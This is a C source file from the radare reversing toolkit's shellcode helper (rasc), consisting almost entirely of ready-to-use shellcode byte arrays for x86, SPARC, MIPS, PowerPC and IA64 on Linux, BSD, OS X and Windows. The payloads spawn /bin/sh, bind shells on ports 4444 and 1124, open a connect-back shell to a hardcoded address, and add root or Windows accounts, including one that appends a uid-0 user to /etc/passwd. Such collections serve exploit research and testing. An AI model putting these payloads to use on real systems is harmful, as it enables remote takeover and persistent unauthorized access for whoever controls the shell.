/*
 * Copyright (C) 2007
 *       pancake <@youterm.com>
 *
 * radare is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * radare is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with radare; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

// XXX: shellcodes are ended with '\0'. so they should not contain any '\0'

#include <stdio.h>
#include "rasc.h"


// moar at:
// http://www.groar.org/expl/openbsd/english.shtml

#if SELFSTOP

#define RET 0x80494c0
// 1) buscar jmp de 5 bytes
#define INJECT jmp $delta-$here-10

linux_selfsigstop:
	push RET
 	/* 68 34 de 04 08 */
        pusha
        mov $20, %eax
        int $0x80
        mov %eax, %ebx /* pid */
        mov $19, %ecx /* stop */
        mov $37, %eax /* kill */
        int $0x80
        popa
	ret


freebsd_selfsigstop:
	push RET_ADDR
        pusha
        mov $20, %eax
        push %ebp
        int $0x80
        pop %ebp

        push $17
        push %eax
        mov $37, %eax
        push %ebp
        int $0x80
        pop %ebp
        pop %ebp
        pop %ebp
        popa
	ret

#endif

#if 0
// dump warns and it has not been tested.. out!
/* from phrack57 */
unsigned long long ia64_linux_binsh[] = {
  /* MLX
   * alloc r34 = ar.pfs, 0, 3, 3, 0   // allocate vars for syscall
   * movl r14 = 0x0168732f6e69622f    // aka "/bin/sh",0x01
   * ;; */
  0x2f6e458006191005,
  0x631132f1c0016873,

  /* MLX
   * xor r37 = r37, r37               // NULL
   * movl r17 = 0x48f017994897c001    // bundle[0]
   * ;; */
  0x9948a00f4a952805,
  0x6602e0122048f017,

  /* MII
   * adds r15 = 0x1094, r37           // unfinished bundle[1]
   * or r22 = 0x08, r37               // part 1 of bundle[1]
   * dep r12 = r37, r12, 0, 8         // align stack ptr
   * ;; */
  0x416021214a507801,
  0x4fdc625180405c94,

  /* MII
   * adds r35 = -40, r12              // circling mem addr 1, shellstr addr
   * adds r36 = -32, r12              // circling mem addr 2, args[0] addr
   * dep r15 = r22, r15, 56, 8        // patch bundle[1] (part 1)
   * ;; */
  0x0240233f19611801,
  0x41dc7961e0467e33,

  /* MII
   * st8 [r36] = r35, 16              // args[0] = shellstring addr
   * adds r19 = -16, r12              // prepare branch addr: bundle[0] addr
   * or r23 = 0x42, r37               // part 2 of bundle[1]
   * ;; */
  0x81301598488c8001,
  0x80b92c22e0467e33,

  /* MII
   * st8 [r36] = r17, 8               // store bundle[0]
   * dep r14 = r37, r14, 56, 8        // fix shellstring
   * dep r15 = r23, r15, 16, 8        // patch bundle[1] (part 2)
   * ;; */
  0x28e0159848444001,
  0x4bdc7971e020ee39,

  /* MMI
   * st8 [r35] = r14, 25              // store shellstring
   * cmp.eq p2, p8 = r37, r37         // prepare predicate for final branch.
   * mov b6 = r19                     // (+0x01) setup branch reg
   * ;; */
  0x282015984638c801,
  0x07010930c0701095,

  /* MIB
   * st8 [r36] = r15, -16             // store bundle[1]
   * adds r35 = -25, r35              // correct string addr
   * (p2) br.cond.spnt.few b6         // (+0x01) branch to constr. bundle
   * ;; */
  0x3a301799483f8011,
  0x0180016001467e8f,
};
#endif

unsigned char nopcode_carver[] ="\x61\x66\x3D\x90\x90\x75\xF9\x54\xc3";

unsigned char x86_linux_binsh[] =
   "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

unsigned char x86_linux_binsh1[] = // -( nemo )-
    "\xeb\x10\x5b\x31\xc0\x50\x53\xb0\x0b\x88\x63\x07\x89\xe1\x31\xd2\xcd\x80\xe8\xeb\xff\xff\xff/bin/shX";

/* 0xcafebabe.it */
unsigned char x86_linux_binsh2[] =
   "\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b\x58\x99\x52"
   "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";

int mips_linux_binsh[] = {
	0x00842026, 0x24020fb7, 0x0000000c, 0x3c086e69, 0x3508622f, 0x3c090068,
	0x3529732f, 0xafa80000, 0xafa90004, 0xafbd0008, 0xafa0000c, 0x03a02021,
	0x23a50008, 0x00003021, 0x24020fab, 0x0000000c, 0x00000000, 0x00000000,
	0x00000000, 0x00000000, 0x00000000, 0x00000000 };

char sparc_linux_binsh[]=
  "\x9d\xe3\xbf\x80"    // save  %sp, -128, %sp
  "\x90\x10\x20\x02"    // mov  2, %o0
  "\xd0\x37\xbf\xe0"    // sth  %o0, [ %fp + -32 ]
  "\x90\x10\x29\x09"    // mov  0x909, %o0
  "\xd0\x37\xbf\xe2"    // sth  %o0, [ %fp + -30 ]
  "\x13\x30\x2a\x19"    // sethi  %hi(0xc0a86400), %o1 <- IPv4 ADDRESS MODIFY THIS.
  "\x90\x12\x60\x01"    // or  %o1, 1, %o0             <- ALSO THIS.
  "\xd0\x27\xbf\xe4"    // st  %o0, [ %fp + -28 ]
  "\x90\x10\x20\x02"    // mov  2, %o0
  "\x92\x10\x20\x01"    // mov  1, %o1
  "\x94\x22\x60\x01"    // sub  %o1, 1, %o2
  "\xd0\x23\xa0\x44"    // st  %o0, [ %sp + 0x44 ]
  "\xd2\x23\xa0\x48"    // st  %o1, [ %sp + 0x48 ]
  "\xd4\x23\xa0\x4c"    // st  %o2, [ %sp + 0x4c ]
  "\x90\x10\x20\x01"    // mov  1, %o0
  "\x92\x03\xa0\x44"    // add  %sp, 0x44, %o1
  "\x82\x10\x20\xce"    // mov  0xce, %g1
  "\x91\xd0\x20\x10"    // ta  0x10
  "\xd0\x27\xbf\xf4"    // st  %o0, [ %fp + -12 ]
  "\x92\x07\xbf\xe0"    // add  %fp, -32, %o1
  "\xd0\x07\xbf\xf4"    // ld  [ %fp + -12 ], %o0
  "\x94\x10\x20\x10"    // mov  0x10, %o2
  "\xd0\x23\xa0\x44"    // st  %o0, [ %sp + 0x44 ]
  "\xd2\x23\xa0\x48"    // st  %o1, [ %sp + 0x48 ]
  "\xd4\x23\xa0\x4c"    // st  %o2, [ %sp + 0x4c ]
  "\x90\x10\x20\x03"    // mov  3, %o0
  "\x92\x03\xa0\x44"    // add  %sp, 0x44, %o1
  "\x82\x10\x20\xce"    // mov  0xce, %g1
  "\x91\xd0\x20\x10"    // ta  0x10
  "\xd0\x07\xbf\xf4"    // ld  [ %fp + -12 ], %o0
  "\x92\x1a\x40\x09"    // xor  %o1, %o1, %o1
  "\x82\x10\x20\x5a"    // mov  0x5a, %g1
  "\x91\xd0\x20\x10"    // ta  0x10
  "\xd0\x07\xbf\xf4"    // ld  [ %fp + -12 ], %o0
  "\x92\x10\x20\x01"    // mov  1, %o1
  "\x82\x10\x20\x5a"    // mov  0x5a, %g1
  "\x91\xd0\x20\x10"    // ta  0x10
  "\xd0\x07\xbf\xf4"    // ld  [ %fp + -12 ], %o0
  "\x92\x10\x20\x02"    // mov  2, %o1
  "\x82\x10\x20\x5a"    // mov  0x5a, %g1
  "\x91\xd0\x20\x10"    // ta  0x10
  "\x2d\x0b\xd8\x9a"    // sethi  %hi(0x2f626800), %l6
  "\xac\x15\xa1\x6e"    // or  %l6, 0x16e, %l6
  "\x2f\x0b\xdc\xda"    // sethi  %hi(0x2f736800), %l7
  "\x90\x0b\x80\x0e"    // and  %sp, %sp, %o0
  "\x92\x03\xa0\x08"    // add  %sp, 8, %o1
  "\xa6\x10\x20\x01"    // mov  1, %l3
  "\x94\x24\xe0\x01"    // sub  %l3, 1, %o2
  "\x9c\x03\xa0\x10"    // add  %sp, 0x10, %sp
  "\xec\x3b\xbf\xf0"    // std  %l6, [ %sp + -16 ]
  "\xd0\x23\xbf\xf8"    // st  %o0, [ %sp + -8 ]
  "\xc0\x23\xbf\xfc"    // clr  [ %sp + -4 ]
  "\x82\x10\x20\x3b"    // mov  0x3b, %g1
  "\x91\xd0\x20\x10";

/* javicoder shellcodes
  --------------------- beerware license
  http://www.48bits.com/papers/sparc_shellcodes.txt
*/
char sparc_linux_javicoder_binsh[] =
    "\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b"
    "\xdc\xda\x90\x0b\x80\x0e\x82\x10\x20\x0b"
    "\x91\xd0\x20\x10\x82\x10\x20\x01\x90\x1a"
    "\x40\x09\x91\xd0\x20\x10";

/* listen shell at port 1124 */
char sparc_linux_javicoder_portbind[] =
  "\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46\xe4\x25"
  "\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46\x84\x12\x22\xd0"
  "\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea\x92\x12\x26\x66\xd2\x39"
  "\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe\xa4\x09\xc1\xea\x96\x12\x22\x12"
  "\xd2\x25\xa2\x46\xe4\x25\xa2\x4a\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2"
  "\x22\x12\xa4\x12\x22\x03\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe"
  "\xd6\x25\xa2\x4e\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29"
  "\xc1\xfa\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
  "\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80\x93\xd2"
  "\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc\x92\x0d\x82\x10"
  "\x84\x12\x22\x0d\x93\xd2\x22\x12";

#if 0
 ( .. 11 instructions .. ) (+44 bytes+deobfusacte+nops)
    mov 0x464, %l1                ! puerto 1124
    sethi %hi(0x0a0c2203), %l2    !
    or %l2, %lo(0x0a0c2203), %l2  ! direcci?n IP 10.12.34.3
#endif
char sparc_linux_javicoder_connect[] =
    /* rutina desofuscadora */
    "\x10\x80\x00\x0c\xa4\x1c\x80\x12\xa2\x03\xe0\x08\xe8\x0c\x40\x05"
    "\xa4\x04\xa0\x01\xa8\x25\x20\x02\xe8\x2c\x40\x05\x80\xa4\xa0\xc4"
    "\x04\xbf\xff\xfb\xa2\x04\x60\x01\x8b\xc3\xe0\x08\xa4\x1c\x80\x12"
    "\x7f\xff\xff\xf6\x8a\x19\x40\x05"
    /*
     * NOPs por la i-cache
     */
    "\x03\x02\x02\x02\x03\x02\x02\x02"
    /*
     * shellcode ofuscada
     */
     "\x9f\xe5\xc1\x82\xa2\x12\x22\x04\xa4\x12\x22\x03\xe2\x25\xa2\x46"
     "\xe4\x25\xa2\x4a\xc2\x25\xa2\x4e\x92\x12\x22\x03\x94\x05\xa2\x46"
     "\x84\x12\x22\xd0\x93\xd2\x22\x12\xd2\x29\xc1\xfe\xe2\x39\xc1\xea"
     "\x92\x12\x26\x66\xd2\x39\xc1\xec\xc2\x29\xc1\xee\xd2\x09\xc1\xfe"
     "\xa4\x09\xc1\xea\x96\x12\x22\x12\xd2\x25\xa2\x46\xe4\x25\xa2\x4a"
     "\xd6\x25\xa2\x4e\x92\x12\x22\x04\x93\xd2\x22\x12\xa4\x12\x22\x03"
     "\x92\x12\x22\x06\x93\xd2\x22\x12\x96\x09\xc1\xfe\xd6\x25\xa2\x4e"
     "\x92\x12\x22\x07\x93\xd2\x22\x12\x94\x12\x22\x05\xd2\x29\xc1\xfa"
     "\x94\x24\x62\x03\x84\x12\x22\x5c\x93\xd2\x22\x12\x82\xa4\x62\x03"
     "\x18\xc1\x01\xfe\xd2\x09\xc1\xfa\x92\x1c\x42\x0b\x84\x12\x22\x80"
     "\x93\xd2\x22\x12\x23\x0d\xda\x9c\xa2\x16\x23\x70\x25\x0d\xde\xdc"
     "\x92\x0d\x82\x10\x84\x12\x22\x0d\x93\xd2\x22\x12";

unsigned char x86_linux_bind4444[] =
   "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x81\x9c\x95"
   "\xe9\x83\xeb\xfc\xe2\xf4\xb0\x47\xc6\xaa\xd2\xf6\x97\x83\xe7\xc4\x0c\x60"
   "\x60\x51\x15\x7f\xc2\xce\xf3\x81\x90\xc0\xf3\xba\x08\x7d\xff\x8f\xd9\xcc"
   "\xc4\xbf\x08\x7d\x58\x69\x31\xfa\x44\x0a\x4c\x1c\xc7\xbb\xd7\xdf\x1c\x08"
   "\x31\xfa\x58\x69\x12\xf6\x97\xb0\x31\xa3\x58\x69\xc8\xe5\x6c\x59\x8a\xce"
   "\xfd\xc6\xae\xef\xfd\x81\xae\xfe\xfc\x87\x08\x7f\xc7\xba\x08\x7d\x58\x69\x00";

unsigned char x86_linux_udp4444[] =
   "\x33\xc9\x83\xe9\xe7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13\xec\x81"
   "\xca\x83\xeb\xfc\xe2\xf4\x22\x37\xd2\xa0\x11\x86\x83\x89\x79\x8a\xd9\x43"
   "\xf2\x21\x01\x59\x4a\x5c\xbe\x07\x93\xa5\xf8\x33\x48\xb6\xe9\xb5\x13\xec"
   "\x80\xac\x7b\xfd\xdd\xac\x40\x65\x60\xa0\x03\xbd\xd2\x43\xf2\xaf\x31\xac"
   "\xde\x6c\xeb\xc1\x4b\xbe\xe7\xa2\x3e\x85\x08\x2b\x79\x8b\xe7\xa2\x7a\x82"
   "\xe9\xaf\x77\x85\xf5\xa2\x3e\xc1\xef\xa5\x9a\x0b\xd3\xa2\x3c\xc3\xf2\xa2"
   "\x7b\xc3\xe3\xa3\x7d\x65\x62\x98\x42\xbb\xd2\x43\xf2\x21\x01\xca\x00";

unsigned char x86_linux_adduser[] =
   "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73"
   "\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd"
   "\x80\x93\xe8\x1f\x00\x00\x00\x78\x3a\x41\x7a\x37\x44\x71\x55\x7a\x47\x6a"
   "\x77\x69\x4d\x77\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73"
   "\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80";


unsigned char x86_bsd_binsh[] =
   "\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51"
   "\xcd\x80\x49\x79\xf5\x6a\x3b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
   "\x69\x6e\x89\xe3\x52\x54\x53\x53\xcd\x80";

unsigned char x86_bsd_binsh2[] =
   "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53"
   "\x50\xb0\x3b\xcd\x80";

unsigned char x86_bsd_bind4444[] =
   "\x31\xc9\x83\xe9\xec\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
   "\xd3\x61\x53\x83\xeb\xfc\xe2\xf4\xa4\xb2\x39\xca\x9c\xbb\x71\x51"
   "\xdf\x8f\xe8\xb2\x9c\x91\x33\x11\x9c\xb9\x71\x9e\x4e\x4a\xf2\x02"
   "\x9d\x81\x0b\x3b\x96\x1e\xe1\xe3\xa4\x1e\xe1\x01\x9d\x81\xd1\x4d"
   "\x03\x53\xf6\x39\xcc\x8a\x0b\x09\x96\x82\x36\x02\x03\x53\x28\x2a"
   "\x3b\x83\x09\x7c\xe1\xa0\x09\x3b\xe1\xb1\x08\x3d\x47\x30\x31\x07"
   "\x9d\x80\xd1\x68\x03\x53\x61\x53";

unsigned char ppc_osx_binsh[] =
   "\x38\xa0\x00\x02\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78"
   "\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff"
   "\x40\x82\xff\xe5\x38\x00\x00\x7e\x38\x60\x00\x00\x38\x80\x00\x00"
   "\x44\x00\x00\x02\x48\x00\x00\x19\x38\x00\x00\x7f\x38\x60\x00\x00"
   "\x38\x80\x00\x00\x44\x00\x00\x02\x7c\xa5\x2a\x78\x38\x00\x00\x02"
   "\x44\x00\x00\x02\x48\x00\x00\x34\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
   "\x7c\x68\x02\xa6\x38\x63\x00\x20\x90\x61\xff\xf8\x90\xa1\xff\xfc"
   "\x38\x81\xff\xf8\x38\x00\x00\x3b\x44\x00\x00\x02\x48\x00\x00\x0c"
   "\x2f\x62\x69\x6e\x2f\x73\x68\x00\x38\x00\x00\x01\x38\x60\x00\x00"
   "\x44\x00\x00\x02\x60\x00\x00\x00";

unsigned char ppc_osx_bind4444[] = 
   "\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
   "\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
   "\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38"
   "\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02"
   "\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00"
   "\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80"
   "\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44"
   "\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02"
   "\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00"
   "\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82"
   "\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c"
   "\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28"
   "\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00"
   "\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0"
   "\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00";

unsigned char x86_w32_bind4444[] = 
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9f"
"\x2a\xdf\x1b\x83\xeb\xfc\xe2\xf4\x63\x40\x34\x56\x77\xd3\x20\xe4"
"\x60\x4a\x54\x77\xbb\x0e\x54\x5e\xa3\xa1\xa3\x1e\xe7\x2b\x30\x90"
"\xd0\x32\x54\x44\xbf\x2b\x34\x52\x14\x1e\x54\x1a\x71\x1b\x1f\x82"
"\x33\xae\x1f\x6f\x98\xeb\x15\x16\x9e\xe8\x34\xef\xa4\x7e\xfb\x33"
"\xea\xcf\x54\x44\xbb\x2b\x34\x7d\x14\x26\x94\x90\xc0\x36\xde\xf0"
"\x9c\x06\x54\x92\xf3\x0e\xc3\x7a\x5c\x1b\x04\x7f\x14\x69\xef\x90"
"\xdf\x26\x54\x6b\x83\x87\x54\x5b\x97\x74\xb7\x95\xd1\x24\x33\x4b"
"\x60\xfc\xb9\x48\xf9\x42\xec\x29\xf7\x5d\xac\x29\xc0\x7e\x20\xcb"
"\xf7\xe1\x32\xe7\xa4\x7a\x20\xcd\xc0\xa3\x3a\x7d\x1e\xc7\xd7\x19"
"\xca\x40\xdd\xe4\x4f\x42\x06\x12\x6a\x87\x88\xe4\x49\x79\x8c\x48"
"\xcc\x79\x9c\x48\xdc\x79\x20\xcb\xf9\x42\xce\x47\xf9\x79\x56\xfa"
"\x0a\x42\x7b\x01\xef\xed\x88\xe4\x49\x40\xcf\x4a\xca\xd5\x0f\x73"
"\x3b\x87\xf1\xf2\xc8\xd5\x09\x48\xca\xd5\x0f\x73\x7a\x63\x59\x52"
"\xc8\xd5\x09\x4b\xcb\x7e\x8a\xe4\x4f\xb9\xb7\xfc\xe6\xec\xa6\x4c"
"\x60\xfc\x8a\xe4\x4f\x4c\xb5\x7f\xf9\x42\xbc\x76\x16\xcf\xb5\x4b"
"\xc6\x03\x13\x92\x78\x40\x9b\x92\x7d\x1b\x1f\xe8\x35\xd4\x9d\x36"
"\x61\x68\xf3\x88\x12\x50\xe7\xb0\x34\x81\xb7\x69\x61\x99\xc9\xe4"
"\xea\x6e\x20\xcd\xc4\x7d\x8d\x4a\xce\x7b\xb5\x1a\xce\x7b\x8a\x4a"
"\x60\xfa\xb7\xb6\x46\x2f\x11\x48\x60\xfc\xb5\xe4\x60\x1d\x20\xcb"
"\x14\x7d\x23\x98\x5b\x4e\x20\xcd\xcd\xd5\x0f\x73\x6f\xa0\xdb\x44"
"\xcc\xd5\x09\xe4\x4f\x2a\xdf\x1b\x00";

unsigned char x86_w32_tcp4444[] =
   "\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7a"
   "\xba\xcb\x13\x83\xeb\xfc\xe2\xf4\x86\xd0\x20\x5e\x92\x43\x34\xec"
   "\x85\xda\x40\x7f\x5e\x9e\x40\x56\x46\x31\xb7\x16\x02\xbb\x24\x98"
   "\x35\xa2\x40\x4c\x5a\xbb\x20\x5a\xf1\x8e\x40\x12\x94\x8b\x0b\x8a"
   "\xd6\x3e\x0b\x67\x7d\x7b\x01\x1e\x7b\x78\x20\xe7\x41\xee\xef\x3b"
   "\x0f\x5f\x40\x4c\x5e\xbb\x20\x75\xf1\xb6\x80\x98\x25\xa6\xca\xf8"
   "\x79\x96\x40\x9a\x16\x9e\xd7\x72\xb9\x8b\x10\x77\xf1\xf9\xfb\x98"
   "\x3a\xb6\x40\x63\x66\x17\x40\x53\x72\xe4\xa3\x9d\x34\xb4\x27\x43"
   "\x85\x6c\xad\x40\x1c\xd2\xf8\x21\x12\xcd\xb8\x21\x25\xee\x34\xc3"
   "\x12\x71\x26\xef\x41\xea\x34\xc5\x25\x33\x2e\x75\xfb\x57\xc3\x11"
   "\x2f\xd0\xc9\xec\xaa\xd2\x12\x1a\x8f\x17\x9c\xec\xac\xe9\x98\x40"
   "\x29\xf9\x98\x50\x29\x45\x1b\x7b\x7a\xba\xcb\x13\x1c\xd2\xda\x4f"
   "\x1c\xe9\x42\xf2\xef\xd2\x27\xea\xd0\xda\x9c\xec\xac\xd0\xdb\x42"
   "\x2f\x45\x1b\x75\x10\xde\xad\x7b\x19\xd7\xa1\x43\x23\x93\x07\x9a"
   "\x9d\xd0\x8f\x9a\x98\x8b\x0b\xe0\xd0\x2f\x42\xee\x84\xf8\xe6\xed"
   "\x38\x96\x46\x69\x42\x11\x60\xb8\x12\xc8\x35\xa0\x6c\x45\xbe\x3b"
   "\x85\x6c\x90\x44\x28\xeb\x9a\x42\x10\xbb\x9a\x42\x2f\xeb\x34\xc3"
   "\x12\x17\x12\x16\xb4\xe9\x34\xc5\x10\x45\x34\x24\x85\x6a\xa3\xf4"
   "\x03\x7c\xb2\xec\x0f\xbe\x34\xc5\x85\xcd\x37\xec\xaa\xd2\x3b\x99"
   "\x7e\xe5\x98\xec\xac\x45\x1b\x13";

char x86_w32_msg[]=
"\xEB"//xored with 0x1d
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
#if 0
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e";
#endif

unsigned char x86_w32_adduser[] =
"\x31\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"
"\x5e\x22\xde\x83\xeb\xfc\xe2\xf4\x14\xb6\x66\xde\xe8\x5e\xa9\x9b"
"\xd4\xd5\x5e\xdb\x90\x5f\xcd\x55\xa7\x46\xa9\x81\xc8\x5f\xc9\x97"
"\x63\x6a\xa9\xdf\x06\x6f\xe2\x47\x44\xda\xe2\xaa\xef\x9f\xe8\xd3"
"\xe9\x9c\xc9\x2a\xd3\x0a\x06\xda\x9d\xbb\xa9\x81\xcc\x5f\xc9\xb8"
"\x63\x52\x69\x55\xb7\x42\x23\x35\x63\x42\xa9\xdf\x03\xd7\x7e\xfa"
"\xec\x9d\x13\x1e\x8c\xd5\x62\xee\x6d\x9e\x5a\xd2\x63\x1e\x2e\x55"
"\x98\x42\x8f\x55\x80\x56\xc9\xd7\x63\xde\x92\xde\xe8\x5e\xa9\xb6"
"\xd4\x01\x13\x28\x88\x08\xab\x26\x6b\x9e\x59\x8e\x80\xae\xa8\xda"
"\xb7\x36\xba\x20\x62\x50\x75\x21\x0f\x3d\x4f\xba\xc6\x3b\x5a\xbb"
"\xc8\x71\x41\xfe\x86\x3b\x56\xfe\x9d\x2d\x47\xac\xc8\x27\x02\xa6"
"\xc8\x71\x63\x9a\xac\x7e\x04\xf8\xc8\x30\x47\xaa\xc8\x32\x4d\xbd"
"\x89\x32\x45\xac\x87\x2b\x52\xfe\xa9\x3a\x4f\xb7\x86\x37\x51\xaa"
"\x9a\x3f\x56\xb1\x9a\x2d\x02\xa7\xc8\x71\x63\x9a\xac\x5e\x22\xde";
/*
   "\x33\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08"
   "\x99\xc6\xb8\x83\xeb\xfc\xe2\xf4\xf4\x71\x82\xb8\x08\x99\x4d\xfd"
   "\x34\x12\xba\xbd\x70\x98\x29\x33\x47\x81\x4d\xe7\x28\x98\x2d\xf1"
   "\x83\xad\x4d\xb9\xe6\xa8\x06\x21\xa4\x1d\x06\xcc\x0f\x58\x0c\xb5"
   "\x09\x5b\x2d\x4c\x33\xcd\xe2\xbc\x7d\x7c\x4d\xe7\x2c\x98\x2d\xde"
   "\x83\x95\x8d\x33\x57\x85\xc7\x53\x83\x85\x4d\xb9\xe3\x10\x9a\x9c"
   "\x0c\x5a\xf7\x78\x6c\x12\x86\x88\x8d\x59\xbe\xb4\x83\xd9\xca\x33"
   "\x78\x85\x6b\x33\x60\x91\x2d\xb1\x83\x19\x76\xb8\x08\x99\x4d\xd0"
   "\x34\xc6\xf7\x4e\x68\xcf\x4f\x40\x8b\x59\xbd\xe8\x60\x69\x4c\xbc"
   "\x57\xf1\x5e\x46\x82\x97\x91\x47\xef\xfa\xab\xdc\x26\xfc\xbe\xdd"
   "\x28\xb6\xa5\x98\x66\xfc\xb2\x98\x7d\xea\xa3\xca\x28\xe1\xe6\xc1"
   "\x28\xb6\x87\xfc\x4c\xb9\xe0\x9e\x28\xf7\xa3\xcc\x28\xf5\xa9\xdb"
   "\x69\xf5\xa1\xca\x67\xec\xb6\x98\x49\xfd\xab\xd1\x66\xf0\xb5\xcc"
